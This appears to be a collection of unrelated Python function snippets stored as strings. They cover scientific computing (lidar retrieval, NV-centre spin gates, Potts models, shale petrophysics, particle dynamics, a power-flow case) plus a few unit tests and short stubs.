"def TDErrorFunction(Prof,x,Trx,rb_spec,abs_spec,dr,inu0,bsrMult,base_T,base_P,r0,lam=[0,0,0,0,0,0]):\n \n iR = Prof['WV Online'].size # range index for a profile into 1D x array\n x2 = np.reshape(x,(iR+1,6))\n xK = x2[0,:] # constants [HSRL Mol HSRL Comb, WV On, WV Off, O2 On ,O2 Off]\n xS = x2[1:,:] # state vector [T, nWV, BSR, phi_HSRL, phi_WV, phi_O2]\n \n # HSRLProfile(T,BSR,phi,rb_spec,Trx,inu0,K,base_T,base_P)\n HSRL_mol = HSRLProfile(xS[:,0],xS[:,2],xS[:,3],rb_spec['HSRL'],Trx['HSRL Mol'],inu0['HSRL'],xK[0],base_T,base_P)+Prof['HSRL Mol BG']\n HSRL_comb = HSRLProfile(xS[:,0],xS[:,2],xS[:,3],rb_spec['HSRL'],Trx['HSRL Comb'],inu0['HSRL'],xK[1],base_T,base_P)+Prof['HSRL Comb BG']\n \n# WVDIALProfile(T,nWV,BSR,phi,rb_spec,abs_spec,Trx,inu0,K,base_T,base_P,dr)\n WV_on = WVDIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['WV'],xS[:,4],rb_spec['WV Online'],abs_spec['WV Online'],Trx['WV Online'],inu0['WV Online'],xK[2],base_T,base_P,dr,r0)+Prof['WV Online BG']\n WV_off = WVDIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['WV'],xS[:,4],rb_spec['WV Offline'],abs_spec['WV Offline'],Trx['WV Offline'],inu0['WV Offline'],xK[3],base_T,base_P,dr,r0)+Prof['WV Offline BG']\n\n# O2DIALProfile(T,nWV,BSR,phi,rb_spec,abs_spec,Trx,inu0,K,base_T,base_P,dr)\n O2_on = O2DIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['O2'],xS[:,5],rb_spec['O2 Online'],abs_spec['O2 Online'],Trx['O2 Online'],inu0['O2 Online'],xK[4],base_T,base_P,dr,r0)+Prof['O2 Online BG']\n O2_off = O2DIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['O2'],xS[:,5],rb_spec['O2 Offline'],abs_spec['O2 Offline'],Trx['O2 Offline'],inu0['O2 Offline'],xK[5],base_T,base_P,dr,r0)+Prof['O2 Offline BG']\n \n# # Optimization error. 
T is piecewise\n# OptError = np.nansum(HSRL_mol-(Prof['HSRL Mol'])*np.log(HSRL_mol)) \\\n# +np.nansum(HSRL_comb-(Prof['HSRL Comb'])*np.log(HSRL_comb)) \\\n# +np.nansum(WV_on-(Prof['WV Online'])*np.log(WV_on)) \\\n# +np.nansum(WV_off-(Prof['WV Offline'])*np.log(WV_off)) \\\n# +np.nansum(O2_on-(Prof['O2 Online'])*np.log(O2_on)) \\\n# +np.nansum(O2_off-(Prof['O2 Offline'])*np.log(O2_off)) \\\n# +lam[0]*np.nansum(np.abs(np.diff(xS[:,0]))) \\\n# +lam[1]*np.nansum(np.abs(np.diff(xS[:,1]))) \\\n# +lam[2]*np.nansum(np.abs(np.diff(xS[:,2]))) \\\n# +lam[3]*np.nansum(np.abs(np.diff(xS[:,3]))) \\\n# +lam[4]*np.nansum(np.abs(np.diff(xS[:,4]))) \\\n# +lam[5]*np.nansum(np.abs(np.diff(xS[:,5]))) \n \n # Optimization error. T is piecewise slope\n OptError = np.nansum(HSRL_mol-(Prof['HSRL Mol'])*np.log(HSRL_mol)) \\\n +np.nansum(HSRL_comb-(Prof['HSRL Comb'])*np.log(HSRL_comb)) \\\n +np.nansum(WV_on-(Prof['WV Online'])*np.log(WV_on)) \\\n +np.nansum(WV_off-(Prof['WV Offline'])*np.log(WV_off)) \\\n +np.nansum(O2_on-(Prof['O2 Online'])*np.log(O2_on)) \\\n +np.nansum(O2_off-(Prof['O2 Offline'])*np.log(O2_off)) \\\n +lam[0]*np.nansum(np.abs(np.diff(np.diff(xS[:,0])))) \\\n +lam[1]*np.nansum(np.abs(np.diff(xS[:,1]))) \\\n +lam[2]*np.nansum(np.abs(np.diff(xS[:,2]))) \\\n +lam[3]*np.nansum(np.abs(np.diff(xS[:,3]))) \\\n +lam[4]*np.nansum(np.abs(np.diff(xS[:,4]))) \\\n +lam[5]*np.nansum(np.abs(np.diff(xS[:,5])))\n \n return OptError", "def prove_NNE() -> Proof:\n # Optional Task 6.7b", "def skip_test(n):\n return k > 0 and magic * n * k**0.5 >= t4_ref", "def Char_Gate(NV,res ,B_field=400):\n\n\n #data = np.loadtxt(\"NV_Sim_8.dat\") #Placeholder data to test the script\n #NV = np.vstack((data[:,3],data[:,4]))\n #physical constants\n gamma_c = 1.071e3 #g-factor for C13 in Hz/G\n #Model parameters\n omega_larmor = 2*np.pi*gamma_c*B_field\n tau_larmor = 2*np.pi/omega_larmor\n tau = res[0]\n n_pulses = int(res[1]*2) #So that we do a pi -pulse\n\n Ix = 0.5 * np.array([[0,1],[1,0]])\n Iz = 0.5* np.array([[1,0],[0,-1]])\n H0 = (omega_larmor)*Iz\n exH0 =linalg.expm(-1j*H0*tau)\n\n\n M = np.zeros(np.shape(NV)[0])\n for idC in range(np.shape(NV)[0]):\n A= 2*np.pi*NV[idC,0]\n B= 2*np.pi*NV[idC,1] #Converts to radial frequency in Hz/G\n H1 = (A+omega_larmor) *Iz +B*Ix\n exH1 = linalg.expm(-1j*H1*tau)\n V0 = exH0.dot(exH1.dot(exH1.dot(exH0)))\n V1 = exH1.dot(exH0.dot(exH0.dot(exH1)))\n n0 = Calc_axis(V0)\n n1 =Calc_axis(V1)\n phi = np.real(2*np.arccos(np.trace(V0)/2))\n M[idC] = 1 - (1-np.dot(n0,n1))*np.sin(n_pulses * phi /2 )**2\n\n Signal = -M.prod()\n F = (1-(Signal+1)/2)\n return F", "def define_potts_helper_functions(k):\n\n @njit\n def calc_observables(X, k=k):\n \"\"\"\n Parameters\n ----------\n X : ndarray of dtype np.int64\n Dimensions (n_samples, n_spins).\n\n Returns\n -------\n ndarray\n Dimensions (n_samples, n_observables).\n \"\"\"\n\n n = X.shape[1]\n Y = np.zeros((len(X), n*k+n*(n-1)//2), dtype=np.int8)\n \n # average orientation (magnetization)\n # note that fields for the third state are often set to 0\n counter = 0\n for i in range(k):\n for j in range(n):\n Y[:,counter] = X[:,j]==i\n counter += 1\n \n # pairwise correlations\n for i in range(n-1):\n for j in range(i+1, n):\n Y[:,counter] = X[:,i]==X[:,j]\n counter += 1\n \n return Y\n\n def calc_e(X, multipliers, k=k, calc_observables=calc_observables):\n \"\"\"\n Parameters\n ----------\n X : ndarray of dtype np.int64\n Dimensions (n_samples, n_spins).\n multipliers : ndarray of dtype np.float64\n\n Returns\n -------\n ndarray\n Energies of each 
observable.\n \"\"\"\n\n return -calc_observables(X, k).dot(multipliers)\n\n def mch_approximation(sample, dlamda, calc_e=calc_e):\n \"\"\"Function for making MCH approximation step for Potts model.\n \n Parameters\n ----------\n sample : ndarray\n Of dimensions (n_sample, n_spins).\n dlamda : ndarray\n Change in parameters.\n \n Returns\n -------\n ndarray\n Predicted correlations.\n \"\"\"\n\n dE = calc_e(sample, dlamda)\n ZFraction = len(dE) / np.exp(logsumexp(-dE))\n predsisj = (np.exp(-dE[:,None]) / len(dE) * calc_observables(sample)).sum(0) * ZFraction \n assert not ((predsisj<0).any() or\n (predsisj>(1+1e-10)).any()),\"Predicted values are beyond limits, (%E,%E)\"%(predsisj.min(),\n predsisj.max())\n return predsisj\n\n return calc_e, calc_observables, mch_approximation", "def ORM1(RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n#\n# 5.1.1 Initialise Outputs & Check for missing values in inputs:\n# --------------------------------------------------------------\n\tPHIt=MissingValue\n\tPHIe=MissingValue\n\tCBW=MissingValue\n\tBVW=MissingValue\n\tHCPV=MissingValue\n\tVf=MissingValue\n\tVs=MissingValue\n\tSwt=MissingValue\n\tSwe=MissingValue\n\tVc1=MissingValue\n\tVc2=MissingValue\n\tVc3=MissingValue\n\tVk=MissingValue\n\tToc=MissingValue\n\tQc=MissingValue\n\tGDen=MissingValue\n\tif MissingValue in (RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n\t\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Vs,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen\n#\n# 5.1.2 Initialise parameters:\n# ----------------------------\n#\t5.1.2.1 Initialise Interation Control Paramaeters:\n#\t--------------------------------------------------\n\tNIter=0\n\tNIterMax=100\n\tErrIter=10000\n\tTolErrIter=0.0001\n\tIterEnd=0\n#\n#\t5.1.2.2 Initialise Volumes and Hydrocarbon Properties:\n#\t------------------------------------------------------\n\tVk=0.000 # Volume of kerogen initialised to zero\n\tVa=0.000 # Volume of adsorbed gas initialised to zero\n\tVf=0.000 # Volume of free gas initialised to zero\n#\n#\t5.7.3 Start interative loop:\n#\t-----------------------------\n\twhile IterEnd==0:\n#\n# 5.7.3.1 Compute Pore Fluid Properties:\n# --------------------------------------\n\t\tSum=Va+Vf\n\t\tif(Sum==0):\n\t\t\tDh=Df\n\t\t\tHIh=HIf\n\t\t\tDTh=DTf\n\t\telse:\n\t\t\tDh=(Va*Da+Vf*Df)/Sum\n\t\t\tHIh=(Va*HIa+Vf*HIf)/Sum\n\t\t\tDTh=(Va*DTa+Vf*DTf)/Sum\n\t\tDpf=(Sxoe*Dw)+(1-Sxoe)*Dh # Density of pore fluid\n\t\tHIpf=(Sxoe*HIw)+(1-Sxoe)*HIh # Hydrogen Index of pore fluid\n\t\tDTpf=(Sxoe*DTw)+(1-Sxoe)*DTh # DT of pore fluid\t\n#\n#\t5.7.3.2 Matrix Inversion:\n#\t-------------------------\n\t\tYMatrix = [RHOB,PHIN,DTCO,1] # Populate YMatrix\n\t\tAMatrix = [[Dc1,Dc2,Dk,Dpf],[HIc1,HIc2,HIk,HIpf],[DTc1,DTc2,DTk,DTpf],[1,1,1,1]] # Populate AMatrix\n\t\tXMatrix,Qc=SolveAndCorrect(AMatrix,YMatrix) # Solve for XMatrix\n\t\tVc1=XMatrix[0] # Volume of component 1\n\t\tVc2=XMatrix[1] # Volume of component 2\n\t\tVc3=0.000 # Volume of component 3 (not calculated in this routine).\n\t\tVk=XMatrix[2] # Volume of organic component\n\t\tPHIe=XMatrix[3] # Volume of hydrocarbon in organic and inorganic pores\n#\n#\t5.7.3.3 Determine Total & Effective Water Saturations:\n#\t-----------------------------------------------------\n\t\tPHIm=(Vc1*PHIc1)+(Vc2*PHIc2)+(Vc3*PHIc3) # Compute Micro 
Porosity\n\t\tPHIt=PHIm+PHIe\n\t\tSwe=fConnectivityModel(RD,Vc1,Vc2,Vc3,Vk,PHIe,Rc1,Rc2,Rc3,Rk,Rw,Rf,Cwv,Ckv,Alpha)\n\t\tif(PHIt==0):\n\t\t\tSwt=1.000\n\t\telse:\n\t\t\tSwt=(PHIm+PHIe*Swe)/PHIt\n#\n#\t5.7.4.3 Compute Volume of Adsorbed and Free Gas:\n#\t------------------------------------------------\n\t\tVa=RSK*Vk # Volume of adsorbed gas in organic pores\n\t\tHCPV=PHIt*(1-Swt)\n\t\tif(Va>=HCPV):\n\t\t\tVa=HCPV\n\t\tVf=HCPV-Va # Volume of free gas\t\n#\n# 5.4.4 Test for interative computations:\n# ---------------------------------------\n\t\tNIter=NIter+1\n\t\tif(NIter>=NIterMax):\n\t\t\tIterEnd=1\n\t\telse:\t\t\t\n\t\t\tif(NIter<=2):\n\t\t\t\tResultOld=[1,1,1,1,1,1,1,1,1] # Initial Setting\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\telse:\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\t\tif(ErrIter<=TolErrIter):\n\t\t\t\t\tIterEnd=1\n#\n# 5.4.6 Preoutput computations:\n# ------------------------------\n\tCBW=PHIm # The assumption is that all microporosity can be considered to be clay bound water.\n\tBVW=PHIe*Swe # Bulk volume of water\n\tHCPV=PHIt*(1-Swt) # Hydrocarbon pore volume\t\n\tToc=fToc_Wtf(Vc1,Vc2,Vc3,Vk,0,Ck,Dc1,Dc2,Dc3,Dk,Dw) # TOC-wt fraction. Note: Vrw=0 in fToc_Wtf(Vc1,Vc2,Vc3,Vk,Vrw,Ck,Dc1,Dc2,Dc3,Dk,Dw) # Total Organic Carbon wt%\n\tGDen=fOrmGDen(Vc1,Vc2,Vc3,Vk,0,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density. Note: Vrw=0 in fOrmGDen(Vc1,Vc2,Vc3,Vk,Vrw,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density g/cm3\n#\n# 5.4.7 Output Results:\n# \t-------------------\n\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Va,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen", "def test_superposition_ud_cnot():\n program = dedent(\n \"\"\"\\\n register q0[0]\n register q1[1]\n H q1\n CNOT q1 q0\n \"\"\"\n )\n\n result = run(program, run_gate_array, return_distribution=True)\n assert isclose(result, [0.5, 0.0, 0.0, 0.5]).all()", "def test_active_inference_SPM_1a(self):\n array_path = os.path.join(os.getcwd(), DATA_PATH + \"vbx_test_1a.mat\")\n mat_contents = loadmat(file_name=array_path)\n\n A = mat_contents[\"A\"][0]\n B = mat_contents[\"B\"][0]\n C = to_arr_of_arr(mat_contents[\"C\"][0][0][:,0])\n obs_matlab = mat_contents[\"obs\"].astype(\"int64\")\n policy = mat_contents[\"policies\"].astype(\"int64\") - 1\n t_horizon = mat_contents[\"t_horizon\"][0, 0].astype(\"int64\")\n actions_matlab = mat_contents[\"actions\"].astype(\"int64\") - 1\n qs_matlab = mat_contents[\"qs\"][0]\n xn_matlab = mat_contents[\"xn\"][0]\n vn_matlab = mat_contents[\"vn\"][0]\n\n likelihoods_matlab = mat_contents[\"likelihoods\"][0]\n\n num_obs, num_states, _, num_factors = get_model_dimensions(A, B)\n obs = convert_observation_array(obs_matlab, num_obs)\n T = len(obs)\n\n agent = Agent(A=A, B=B, C=C, inference_algo=\"MMP\", policy_len=1, \n inference_horizon=t_horizon, use_BMA = False, \n policy_sep_prior = True)\n \n actions_python = np.zeros(T)\n\n for t in range(T):\n o_t = (np.where(obs[t])[0][0],)\n qx, xn_t, vn_t = agent.infer_states_test(o_t)\n q_pi, efe= agent.infer_policies()\n action = agent.sample_action()\n\n actions_python[t] = action\n\n xn_python = build_xn_vn_array(xn_t)\n vn_python = build_xn_vn_array(vn_t)\n\n if t == T-1:\n xn_python = xn_python[:,:,:-1,:]\n vn_python = vn_python[:,:,:-1,:]\n\n start_tstep = max(0, agent.curr_timestep - agent.inference_horizon)\n end_tstep = min(agent.curr_timestep + 
agent.policy_len, T)\n\n xn_validation = xn_matlab[0][:,:,start_tstep:end_tstep,t,:]\n vn_validation = vn_matlab[0][:,:,start_tstep:end_tstep,t,:]\n\n self.assertTrue(np.isclose(xn_python, xn_validation).all())\n self.assertTrue(np.isclose(vn_python, vn_validation).all())\n \n self.assertTrue(np.isclose(actions_matlab[0,:],actions_python[:-1]).all())", "def solveverlet(self,T,dt):\r\n t = 0.\r\n self.dt = dt\r\n self.n = int(T/dt)\r\n L = self.param[2]\r\n N = self.particles.size\r\n\r\n self.U = np.zeros([self.n])\r\n\r\n progress = t/T*100\r\n\r\n #JV: Here we define the number of the GxG grid that we will need to calcule the entropy, change in order to change the precision of this grid\r\n self.G = 7\r\n\r\n #JV: We create a list that will be useful for the walls submenu, that will help us in the border conditions of the wall, see in vel_verlet()\r\n self.bouncing = np.zeros(self.particles.size)\r\n\r\n if(self.param[4] == \"Subsystems\"): #JV: If we are on \"Subsystems\", we will count different the types of particles\r\n self.grid = np.zeros([self.G,self.G,2])\r\n else:\r\n self.grid = np.zeros([self.G,self.G,2]) #JV: When we are not in \"Subsystems\", we will have the same type of variable, but will only use the [:,:,0] (this is because numba has problems otherwise)\r\n\r\n self.entropy_val = 0\r\n\r\n #JV: If we are simulating the brownian simulation, we initialize the array that will keep track if the brownian particle goes through a wall\r\n if(self.param[4] == \"Brownian\"):\r\n self.wallcount = np.zeros([2])\r\n else:\r\n self.wallcount = np.zeros([2]) #JV: We have to keep both in the same type of variables, otherwise numba will have problems. So now this conditional block is quite poinless. TO-ERASE\r\n\r\n np.vectorize(lambda i: i.reset())(self.particles) #This line resets the particles to their initial position\r\n\r\n self.vel_verlet_on = True #JV: If it's true, it will compute with the velocity verlet algorithm, if it's not, it will compute with normal verlet\r\n\r\n self.Nlist = int(1*(self.particles.size)**(1/2)) #JV:This variable defines the number of close particles that will be stored in the list (go to close_particles_list() for more info)\r\n #print(self.Nlist)\r\n\r\n #X,Y,VX,VY has the trajectories of the particles with two indexes that\r\n #access time and particles, respectively\r\n self.X = np.vectorize(lambda i: i.r[0])(self.particles)\r\n self.Y = np.vectorize(lambda i: i.r[1])(self.particles)\r\n self.VX = np.vectorize(lambda i: i.v[0])(self.particles)\r\n self.VY = np.vectorize(lambda i: i.v[1])(self.particles)\r\n\r\n MX, MXT = np.meshgrid(self.X[:],self.X[:])\r\n MY, MYT = np.meshgrid(self.Y[:],self.Y[:])\r\n\r\n #JV: So dx is a nxn simetric array with 0 in the diagonal, and each position is the corresponding distance between the particles,\r\n # so the position [1,2] is the distance between partcle 1 and 2 (x1-x2), and so on\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: we first calculate the matrix that contains in every row the indexs of the m closest particles\r\n\r\n if(self.vel_verlet_on == True):\r\n #JV: We define the variables that we will need in the velocity verlet algorithm\r\n print(\"Computing with the Velocity-Verlet algorithm\")\r\n X0 = self.X\r\n Y0 = self.Y\r\n VX0 = self.VX\r\n VY0 = self.VY\r\n\r\n X1 = self.X\r\n Y1 = self.Y\r\n VX1 = self.VX\r\n VY1 = self.VY\r\n\r\n MX, MXT = 
np.meshgrid(X0[:],X0[:],copy=False)\r\n MY, MYT = np.meshgrid(Y0[:],Y0[:],copy=False)\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n if(np.round((t/self.dt*dt)%0.5,1) == 0): #JV: every certain amount of steps we update the list\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: matrix that contains in every row the indexs of the m closest particles\r\n\r\n a0 = (1/self.m)*np.transpose(fv(X0[:],Y0[:],dx,dy,r2,t/self.dt,False,self.param[2],self.particles.size,self.U,self.dt,self.close_list,self.Nlist,self.vel_verlet_on,self.R,self.param[3],self.param[4],self.param[5],self.grid,self.G,self.wallcount,self.X2))\r\n\r\n for i in range(0, self.n):\r\n r1 = np.array([X0,Y0]) + np.array([VX0,VY0])*dt + 0.5*a0*dt**2\r\n\r\n MX, MXT = np.meshgrid(r1[0,:],r1[0,:],copy=False)\r\n MY, MYT = np.meshgrid(r1[1,:],r1[1,:],copy=False)\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n if(self.param[3] == \"Free!\"):\r\n #JV: We do this to get the actual distance in the case of the \"Free!\" simulation, in which there is no elastic collision between the particles and the boundaries\r\n dx_v2 = (np.abs(dx.copy())-1*L)\r\n r2_v2 = dx_v2**2+dy**2\r\n dx = np.where(r2 > r2_v2,dx_v2*np.sign(dx),dx)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n dy_v2 = (np.abs(dy.copy())-1*L)\r\n r2_v2 = dx**2+dy_v2**2\r\n dy = np.where(r2 > r2_v2,dy_v2*np.sign(dy),dy)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n r2_v2 = dx_v2**2+dy_v2**2\r\n dx = np.where(r2 > r2_v2,dx_v2*np.sign(dx),dx)\r\n dy = np.where(r2 > r2_v2,dy_v2*np.sign(dy),dy)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n\r\n #JV: call velocityverlet to compute the next position\r\n if(np.round((t/self.dt*dt)%0.5,1) == 0): #JV: every certain amount of steps we update the list\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: matrix that contains in every row the indexs of the m closest particles\r\n\r\n X1,Y1,VX1,VY1,a1 = vel_verlet(t,dt,np.array([X0,Y0]),np.array([VX0,VY0]),a0,dx,dy,r2,self.close_list,self.m,self.R,L,N,self.param[3],self.param[4],self.param[7],self.param[8],self.param[9],self.U,self.Nlist,self.vel_verlet_on,self.param[5],self.grid,self.G,self.wallcount,self.X2,self.bouncing)\r\n\r\n #JV: Now we check where this particle is in a RxR grid, that will help us to calcule the entropy. 
We do not do this for the Brownian mode because we don't compute the entropy in that case.\r\n if(self.param[4] != \"Brownian\"):\r\n for h in range(0, N):\r\n if(self.param[4] == \"Subsystems\"):\r\n if(h < self.param[5]**2): #JV: self.param[5] stores the number of n1xn1 type 1 particles\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G)),0] += 1\r\n else:\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G)),1] += 1\r\n else:\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G))] += 1\r\n\r\n if(self.param[4] == \"Brownian\"):\r\n if(self.wallcount[0] == 0):\r\n self.X2 = np.append(self.X2,(abs(X1[N-1]))**2)\r\n else:\r\n self.X2 = np.append(self.X2,(L*self.wallcount[0]+(X1[N-1]))**2)\r\n self.entropy = np.append(self.entropy,self.entropy_val)\r\n\r\n t += dt\r\n\r\n self.X = np.vstack((self.X,X1))\r\n self.Y = np.vstack((self.Y,Y1))\r\n self.VX = np.vstack((self.VX, VX1))\r\n self.VY = np.vstack((self.VY, VY1))\r\n a0 = a1\r\n\r\n #Redefine and repeat\r\n X0,Y0 = X1,Y1\r\n VX0,VY0 = VX1,VY1\r\n\r\n #JV: Every amount of steps of time we calculate the entropy\r\n update_entropy = 2\r\n if(i % update_entropy == 0):\r\n\r\n self.entropy_val = 0\r\n sumagrid = np.sum(self.grid)\r\n\r\n if(self.param[4] == \"Subsystems\"):\r\n sumagrid_subs = np.zeros([2])\r\n sumagrid_subs[0] = np.sum(self.grid[:,:,0]) #JV: Number of type-0 particles\r\n sumagrid_subs[1] = sumagrid - sumagrid_subs[0] #JV: Number of type-1 particles\r\n\r\n for j in range(self.G):\r\n for k in range(self.G):\r\n for l in range(2):\r\n if ((self.grid[j,k,0]+self.grid[j,k,1]) != 0):\r\n # pji = float(self.grid[j,k,l])/(update_entropy*(self.grid[j,k,0]+self.grid[j,k,1]))\r\n pji = float((self.grid[j,k,l]/(sumagrid_subs[l]/(sumagrid_subs[0]+sumagrid_subs[1])))/(update_entropy*(self.grid[j,k,0]/(sumagrid_subs[0]/(sumagrid_subs[0]+sumagrid_subs[1])))+(self.grid[j,k,1]/(sumagrid_subs[1]/(sumagrid_subs[0]+sumagrid_subs[1])))))\r\n else:\r\n pji = 0\r\n if(pji != 0):\r\n self.entropy_val += -pji*np.log(pji) #JV: We will only calculate the value when pji != 0\r\n\r\n self.entropy_val = self.entropy_val /(self.G**2)\r\n\r\n else:\r\n for j in range(self.G):\r\n for k in range(self.G):\r\n pji = float(self.grid[j,k,0])/(update_entropy*sumagrid)\r\n if(pji != 0):\r\n self.entropy_val += -pji*np.log(pji)\r\n\r\n self.entropy_val = self.entropy_val /(self.G**2)\r\n\r\n if(self.param[4] == \"Subsystems\"):\r\n self.grid = np.zeros([self.G,self.G,2])\r\n else:\r\n self.grid = np.zeros([self.G,self.G,2])\r\n\r\n #Update and show progress through console\r\n progress = t/T*100\r\n if(i%1000 == 0):\r\n print(int(progress),'% done')\r\n\r\n else:\r\n print(\"Computing with the Verlet algorithm\")\r\n\r\n #Generation of the precious position (backwards euler step)\r\n X1 = self.X\r\n Y1 = self.Y\r\n X0 = X1 - self.VX*dt\r\n Y0 = Y1 - self.VY*dt\r\n\r\n for self.i in range(0,self.n):\r\n #Call verlet to compute the next position\r\n X2,Y2 = self.verlet(t,dt,np.array([X0,Y0]),np.array([X1,Y1]))\r\n t = t + dt\r\n\r\n #Add the new positions to X,Y,VX,VY\r\n self.X = np.vstack((self.X,X2))\r\n self.Y = np.vstack((self.Y,Y2))\r\n self.VX = np.vstack((self.VX,(X2-X0)/(2*dt)))\r\n self.VY = np.vstack((self.VY,(Y2-Y0)/(2*dt)))\r\n\r\n #Redefine and repeat\r\n X0,Y0 = X1,Y1\r\n X1,Y1 = X2,Y2\r\n\r\n #Update and show progress through console\r\n progress = t/T*100\r\n if(self.i%1000 == 0):\r\n print(int(progress),'% done')\r\n\r\n #Once the computation has ended, I 
compute the kinetic energy,\r\n #the magnitude of the velocity V and the temperature\r\n #(see doc for temperature definition)\r\n self.KE()\r\n self.V = np.sqrt((self.VX**2 + self.VY**2))\r\n self.T = (np.sum(self.V**2,axis=1)/(self.particles.size*2 - 2))\r\n\r\n #Generation of the MB functions, you can modify the definition by\r\n #changing the linspace points\r\n vs,a = np.meshgrid(np.linspace(0,self.V.max(),100),self.T)\r\n a,ts = np.meshgrid(np.linspace(0,self.V.max(),100),self.T)\r\n self.MB = (vs/(ts)*np.exp(-vs**2/(2*ts)))\r\n\r\n #JV: If we are on the Subsystems submenu, we will calculate the temperature and the MB distribution of both types of particles\r\n if(self.param[4] == \"Subsystems\"):\r\n\r\n #JV: 1st group of particles\r\n self.V1 = np.sqrt((self.VX[:,0:(self.param[5]**2)]**2 + self.VY[:,0:(self.param[5]**2)]**2))\r\n self.T1 = (np.sum(self.V1**2,axis=1)/((self.param[5]**2)*2 - 2))\r\n\r\n vs1,a1 = np.meshgrid(np.linspace(0,self.V1.max(),100),self.T1)\r\n a1,ts1 = np.meshgrid(np.linspace(0,self.V1.max(),100),self.T1)\r\n self.MB1 = (vs1/(ts1)*np.exp(-vs1**2/(2*ts1)))\r\n\r\n #JV: 2nd group\r\n self.V2 = np.sqrt((self.VX[:,(self.param[5]**2):self.particles.size]**2 + self.VY[:,(self.param[5]**2):self.particles.size]**2))\r\n self.T2 = (np.sum(self.V2**2,axis=1)/((self.particles.size-self.param[5]**2)*2 - 2))\r\n\r\n vs2,a2 = np.meshgrid(np.linspace(0,self.V2.max(),100),self.T2)\r\n a2,ts2 = np.meshgrid(np.linspace(0,self.V2.max(),100),self.T2)\r\n self.MB2 = (vs2/(ts2)*np.exp(-vs2**2/(2*ts2)))\r\n\r\n \"\"\"Here I generate the accumulated V,T and MB using lists, the reason I use lists is because if you append two numpy arrays\r\n to an empty numpy array, they merge instead of remaining separate. You could technically use splicing to save on memory\r\n but sacrificing cpu.\"\"\"\r\n\r\n self.Vacu = []\r\n self.Tacu = []\r\n self.MBacu = []\r\n self.Vacu.append(self.V[int(self.n/2),:])\r\n self.Tacu.append(np.sum(self.V[int(self.n/2),:]**2)/(self.particles.size*2 - 2))\r\n\r\n vs = np.linspace(0,self.V.max(),100)\r\n self.MBacu.append((vs/(self.Tacu[0])*np.exp(-vs**2/(2*self.Tacu[0]))))\r\n\r\n #This delta controls the time interval for accumulation, right now its every 5 units\r\n delta = 5./dt\r\n\r\n #This 40 that appers in these lines is the time from which I start accumulating\r\n #to ensure the system has reached equilibrium.\r\n for i in range(1,int((self.n-(40./dt))/delta)):\r\n self.Vacu.append(np.hstack((self.Vacu[i-1],self.V[int(40./dt)+int(i*delta),:])))\r\n self.Tacu.append(np.sum(self.Vacu[i]**2)/(self.Vacu[i].size*2 - 2))\r\n self.MBacu.append((vs/(self.Tacu[i])*np.exp(-vs**2/(2*self.Tacu[i]))))\r\n return", "def case():\r\n #ppc = {\"version\": '2'}\r\n ppc = {}\r\n ##----- Power Flow Data -----##\r\n ## system MVA base\r\n ppc[\"baseMVA\"] = 100.0\r\n\r\n ## bus data\r\n # bus_i type Pd Qd Gs Bs area Vm Va baseKV zone Vmax Vmin\r\n ppc[\"bus\"] = array([\r\n [1, 3, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [2, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [3, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [4, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [5, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [6, 1, 0, 0, 0, 0, 1, 1, 